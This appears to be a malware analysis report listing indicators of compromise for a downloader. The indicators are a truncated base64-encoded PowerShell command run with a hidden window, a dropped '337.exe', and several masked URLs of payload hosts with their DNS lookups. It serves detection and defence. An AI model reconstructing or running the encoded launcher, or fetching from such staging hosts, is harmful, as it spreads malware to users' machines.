Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEAHYAYwB3AG8AYQBmAGgAYQB4AGUAPQAnAEIAZwBhAG4AawBjAHkAbwBkAHkAegBpAHAAJwA7ACQAUQBvAG0AegBhAHoAbwB1AGEAIAA9ACAAJwAzADMANwAnADsAJABFAGoAbQBhAGIAbABoAHAAaQB2AGcAPQAnAFIAawBtAGMAcQB5AHQAegBiAG...
- %HOMEPATH%\337.exe
- http://fe###nent.com/wp/UqU/
- http://li####y.blvrdev.com/stats/bLH/
- http://mi#######y.azurewebsites.net/calendar/bNmo99828/
- http://ne###hetty.xyz/wp-admin/vNWZ/
- http://st#####official.shop/pokjbg746ihrtr/3u/
- DNS ASK fe###nent.com
- DNS ASK li####y.blvrdev.com
- DNS ASK mi#######y.azurewebsites.net
- DNS ASK ne###hetty.xyz
- DNS ASK st#####official.shop
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEAHYAYwB3AG8AYQBmAGgAYQB4AGUAPQAnAEIAZwBhAG4AawBjAHkAbwBkAHkAegBpAHAAJwA7ACQAUQBvAG0AegBhAHoAbwB1AGEAIAA9ACAAJwAzADMANwAnADsAJABFAGoAbQBhAGIAbABoAHAAaQB2AGcAPQAnAFIAawBtAGMAcQB5AHQAegBiAG...' (with hidden window)